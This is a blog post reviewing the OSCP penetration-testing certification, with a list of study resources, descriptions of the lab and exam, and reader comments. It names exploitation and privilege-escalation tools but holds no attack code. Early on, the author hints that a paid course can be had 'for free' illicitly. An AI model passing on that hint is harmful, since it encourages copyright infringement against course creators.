MY OSCP REVIEW
About me
I am just a guy who has done a B.E. (Computer Engineering) and C.E.H, and I do vulnerability assessments for different clients in Mumbai.
Inspiration to do OSCP
If you only want to read the technical stuff, skip this para. Like other guys, I thought that OSCP is one of the most difficult tasks in the world of IT security. And yes, it is one of the most difficult missions you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing; I wanted to do more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment was critical most of the time and the time for completing the task was short.
So I asked a few questions in a Facebook group about how I could learn more exploitation stuff.
A guy by the name of Mr.WhiteW0rm gave me a brilliant answer and recommended that I do OSCP. At that time I thought that even though I might not be able to do OSCP, at least I would study along its path and work on exploitation as required for OSCP.
Study that I did before OSCP:
I knew that we can use Metasploit in the labs and in the exam, so I started with learning Metasploit. Though I knew a bit of it, as taught in C.E.H classes, I needed to know more.
A friend of mine named Chetan told me to learn Metasploit from Security Tube.
Learning Metasploit:
1) The Security Tube Metasploit Megaprimer, which can be found here http://www.securitytube.net/groups?operation=view&groupId=8
2) Udemy Metasploit tutorial by Mr. Hitesh Choudhary, which can be found here https://www.udemy.com/draft/93016/
The above course material is available for free ;) if you know what I mean.
Learning Python:
1) I learnt only the first and third modules from it. Basically, Python basics and socket programming are required for buffer overflow exploitation and OSCP.
2) The book that I referred to for practising Python programs is Violent Python. I did the first 4-5 programs from the book.
Learning buffer overflow:
1) It explains buffer overflow in detail.
2) I used the Exploit Research Megaprimer http://www.securitytube.net/groups?operation=view&groupId=7
3) Lastly, I set up my own lab and practised buffer overflows. I wrote up 2 such buffer overflow exploits on my blog:
http://justpentest.blogspot.in/2015/08/echoserver-strcpy-bufferoverflow.html
http://justpentest.blogspot.in/2015/07/minishare1.4.1-bufferoverflow.html
Learning port forwarding and pivoting:
Practising on vulnhub.com VMs:
I would recommend the following VMs:
1) Kioptrix series present here https://www.vulnhub.com/series/kioptrix,8/
2) Troll series present here https://www.vulnhub.com/series/tr0ll,49/
3) Pegasus present here https://www.vulnhub.com/entry/pegasus-1,109/
4) Command Injection ISO by Security Tube https://www.vulnhub.com/entry/command-injection-iso-1,81/ (Try to do this without Metasploit, as I did here http://justpentest.blogspot.in/2015/07/pentester-academy-command-injection-iso-basilic-exploit.html )
The practical exposure I got came from vulnhub.com. A big thanks to the guys who made it.
Post exploitation and privilege escalation:
Some privilege escalation tools that I've used for Linux:
1) Linux priv checker www.securitysift.com/download/linuxprivchecker.py
2) LinEnum http://www.rebootuser.com/?p=1758#.VkG1BSvHU1I
3) Linux Exploit Suggester https://github.com/PenturaLabs/Linux_Exploit_Suggester
I guess 90% of the privilege escalation loopholes can be enumerated with the above tools.
Privilege escalation is an art; trust me, it troubled me a lot in the OSCP labs. Privilege escalation is all about how well you know Linux.
Some privilege escalation tools that I've used for Windows:
1) Windows Exploit Suggester https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
Some good information regarding Windows privilege escalation can be found in the Security Tube Metasploit Megaprimer.
My OSCP Lab Review:
I took one month of lab time, but I would recommend 2 months, which is sufficient. There are approximately 35+ machines in the student network, and there are 3 network keys that can be found on some of the hosts in the student network. These keys will help you unlock the other LAN segments. Well, I got 2 network keys. Lab time is a time that I will never forget in my life. There were a few days when I was really happy because I had compromised my target. But there were many days when I was really upset and disappointed. There was a day I was so frustrated that I thought of quitting. As they say, "TRY HARDER": I took a break, tried harder and harder, and finally compromised my target.
I can proudly say I was able to get root on one of the toughest machines in the lab, named "PAIN".
All in all, I could say lab time is a journey; it will teach you a lot. In the labs you will find a variety of operating systems (Linux, Solaris, Windows, Ubuntu, Debian etc.), a variety of application servers (Apache, IIS, Tomcat, in their different versions and flavours), various services and various vulnerabilities.
There are some pretty famous frameworks that are used in corporate networks, but they are vulnerable and can be compromised to get the system.
The Offsec admins help sometimes and give disappointing answers at other times. I would say that instead of asking the admins your query, you should concentrate on enumeration and use Google. I would recommend "MINIMUM USAGE OF METASPLOIT IN LABS", as this will increase your skill and is very helpful.
My OSCP Exam Review:
There are 5 machines in the exam that are supposed to be compromised. On 3 of the machines the usage of Metasploit is allowed, but you can use Metasploit on only 1 of those 3 machines. There are a few lab machines that are more difficult than all of the machines in the exam.
The problem with the exam is that you have to compromise 5 machines. For one of them you have to code a buffer overflow exploit. For the other machines you need to do a lot of enumeration, which is time consuming.
I cleared all 5 machines with root access in 10 hours.
Congratulations are in order. I am sure you have a transparent way out now ;)
Congratulations !!! Hope this will motivate me to try this ... thanks for your detailed explanation ...
Thanks for the write up. BTW, how do I access the Metasploit Udemy course for free? I'd like to take the course.
Hi,
I would like to know if you had to:
1) Code for SEH/Egg Hunters in the lab or in the exam? Also, do we need to learn Linux buffer overflows?
2) Is it worth bruteforcing for weak credentials?
Thanks
Amazing article, excellent work brother
Hi Hashim,
Congratulations on your certification. I am planning to take this exam and I have a very basic question: is it good to have Windows 7 with Kali Linux as a VM, or Kali Linux itself on the laptop? I can have any of these but wanted to know which will help more.
Kali in a VM is good enough; that's what most people do...
Great work
Thanks Hashim for your work and blog posts. I have followed your posts and your guidance regarding OSCP. I am OSCP now. Thanks for your help.
Congrats Hashim for OSCP and thanks for sharing the useful links.
If you need any help, email me at a.sharabati@gmail.com
by Ahmad Adel Moh. Sharabati